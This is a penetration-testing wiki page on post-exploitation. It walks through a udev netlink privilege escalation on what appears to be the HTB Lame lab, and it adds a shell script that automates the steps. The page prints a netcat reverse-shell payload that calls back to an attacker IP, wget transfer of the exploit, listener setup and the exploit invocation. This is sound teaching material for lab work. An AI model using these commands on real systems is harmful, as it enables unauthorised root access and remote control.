The gMan nixWiki

Because the mind is made of Teflon...


Post-Exploitation

Review

The six steps/stages of a PenTest…

  1. Pre-Engagement: Planning & Scope
  2. Recon: Information Gathering
  3. Scanning
  4. Exploitation
  5. Post-Exploitation
  6. Post-Engagement: Report

Overview

Outline of the Post-Exploitation Stage:

  1. Pivot
    1. Horizontal Movement: Lateral Moves
    2. Vertical Movement: Privilege Escalation
  2. Additional Recon
    1. Identify new targets previously not visible
    2. GOAL: Enumeration (build a list of new, potential targets not previously visible)
      • Users: usernames & passwords (cracking: most common post-exploitation attack)
      • Groups: for lateral movement and/or privilege escalation
      • Forest(s): in Active Directory (AD) environments
      • Sensitive Data: because that's why we are here… right?
      • Unencrypted Files: because they contain information we may be able to leverage
  3. Avoid Detection
  4. Exfiltration
  5. Clean-Up
    • Concealment
    • Retain Access

Privilege Escalation

udevd

If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…

Four local Linux exploits using udevd to escalate privileges to root:

  1. Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
  2. Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
  3. Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
  4. Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)

The walk-through from the video is described below:

On the target machine, see if udev is running:

ps ax | grep udevd

On the target machine, check the version of udev; run:

dpkg -l | grep udev
# On HTB Lame I got version 117-8

Google the udev version or run searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: the Path column that searchsploit prints is relative to the local copy of the exploit database in /usr/share/exploitdb/exploits/…

-------------------------------------------------------- ----------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ----------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb
-------------------------------------------------------- ----------------------

First, spin up a web server on your Kali box (your attack machine) so you can move the exploit over onto the target box:

systemctl start apache2  # or: service apache2 start

Copy the exploit file over to the web server subdir:

cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/

Check & Read:

  • cd into /var/www/html and make sure your file is there. Open it up with an editor and look at what it needs to run.
  • The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
    • Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
    • The exploit will execute /tmp/run (a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.

From your shell over on the target, change into /tmp and pull the file from your Kali attack machine with wget. Fetch it under its real name, 8572.c, since that is the file you copied into the web root and the name gcc is given below:

cd /tmp
wget http://10.10.14.11/8572.c  # 10.10.14.11 is the IP of your Kali/attack machine

Build your run file on the target, in the /tmp directory. Remember, /tmp/run is the payload the udev exploit executes as root, so it is just a small shell script. Make it executable so udev can actually run it:

echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run
chmod +x run

When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine

Compile the .c file you copied to the target. This needs gcc on the target; if it is missing, compile on Kali for the target's architecture and libc and wget the resulting binary instead:

gcc 8572.c -o 8572  # name the output whatever you want

Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target:

nc -nvlp 5555  # make sure it's the same port number

Now the listener is waiting for a connection on the Kali attack machine…

Run the udev exploit on the target with the netlink socket PID as argv[1]. That PID is the Pid column of the udevd entry in /proc/net/netlink (usually the udevd PID from ps minus one); 2687 was the value on the box in the walk-through, yours will differ. The exploit makes udev execute /tmp/run as root, which throws the reverse shell back to your Kali attack machine.

./8572 2687  # replace 2687 with the netlink PID from your target

You should now have a reverse shell on your Kali machine with root privileges on the target; run id in it and confirm you see uid=0(root). Done.
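To tie the target-side checks above together, here is an added example in POSIX shell (it is not the wiki author's or the video's code). It automates the pieces the walk-through does by eye: pulling the netlink socket PID that the exploit takes as argv[1] out of /proc/net/netlink (udevd's socket is the protocol-15, NETLINK_KOBJECT_UEVENT, entry), sanity-checking it against the udevd PID from ps, deciding from the dpkg version string whether the netlink bug is present (it was fixed in udev 141, the version exploit-db prints as "1.4.1"), and writing an executable /tmp/run. The /proc/net/netlink table, the udevd PID 2687 and the version "117-8" are constructed sample data, not captured from HTB Lame; the IP and port are the ones used above.

```shell
#!/bin/sh
# Added example for the udev walk-through (not the wiki's own code).
# Every function reads its input from arguments or stdin so it can be run
# against the constructed sample below; on a real target feed it the live
# file and command output instead.

# Print the Pid of the NETLINK_KOBJECT_UEVENT socket (Eth column == 15,
# the netlink protocol number udevd listens on). Reads /proc/net/netlink
# from stdin; skips the header row and kernel-side sockets (Pid 0).
uevent_netlink_pid() {
    awk 'NR > 1 && $2 == 15 && $3 != 0 { print $3; exit }'
}

# The exploit's usage note says the netlink PID is usually the udevd PID
# minus one; accept that or an exact match, reject anything else.
pid_pair_plausible() {
    udevd_pid="$1"; nl_pid="$2"
    [ "$nl_pid" -eq "$udevd_pid" ] || [ "$nl_pid" -eq $((udevd_pid - 1)) ]
}

# Take the version column from `dpkg -l udev` (e.g. "117-8") and return 0
# if it is older than udev 141, the release that fixed the netlink bug.
udev_version_affected() {
    major=$(printf '%s\n' "$1" | sed 's/[^0-9].*//')
    [ -n "$major" ] && [ "$major" -lt 141 ]
}

# Write the payload the exploit runs as root and mark it executable
# (udev runs the path like any other program, so it needs the exec bit).
write_run_payload() {
    path="$1"; lhost="$2"; lport="$3"
    printf '#!/bin/sh\n/bin/netcat -e /bin/sh %s %s\n' "$lhost" "$lport" > "$path"
    chmod +x "$path"
}

# --- constructed sample: what /proc/net/netlink might look like on a box
# where udevd is PID 2687 (assumed values, not captured from a real host) ---
SAMPLE_NETLINK='sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
ffff88003b9c5400 0   0      00000000 0        0        (null) 2
ffff88003b9c4000 9   1203   00000000 0        0        (null) 2
ffff88003b9c4c00 15  0      00000001 0        0        (null) 2
ffff88003b9c5c00 15  2686   00000001 0        0        (null) 2'
SAMPLE_UDEVD_PID=2687
SAMPLE_UDEV_VERSION="117-8"

# Stand-alone run: print what you would pass to ./8572, and build the run
# script in a scratch file so the demo does not touch the real /tmp/run.
nl_pid=$(printf '%s\n' "$SAMPLE_NETLINK" | uevent_netlink_pid)
if pid_pair_plausible "$SAMPLE_UDEVD_PID" "$nl_pid"; then
    echo "netlink socket PID for argv[1]: $nl_pid"
else
    echo "netlink PID $nl_pid does not line up with udevd PID $SAMPLE_UDEVD_PID, check by hand" >&2
fi
if udev_version_affected "$SAMPLE_UDEV_VERSION"; then
    echo "udev $SAMPLE_UDEV_VERSION is older than 141: netlink bug present"
fi
demo_run=$(mktemp)
write_run_payload "$demo_run" 10.10.14.11 5555
cat "$demo_run"
rm -f "$demo_run"
```

On a real target, replace the sample with `uevent_netlink_pid < /proc/net/netlink`, the PID from `ps ax | grep [u]devd`, and the version from `dpkg -l udev`; if the plausibility check fails, read /proc/net/netlink yourself rather than trusting the "minus one" rule of thumb.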


method_5_post-exploitation.1668973248.txt.gz · Last modified: by gman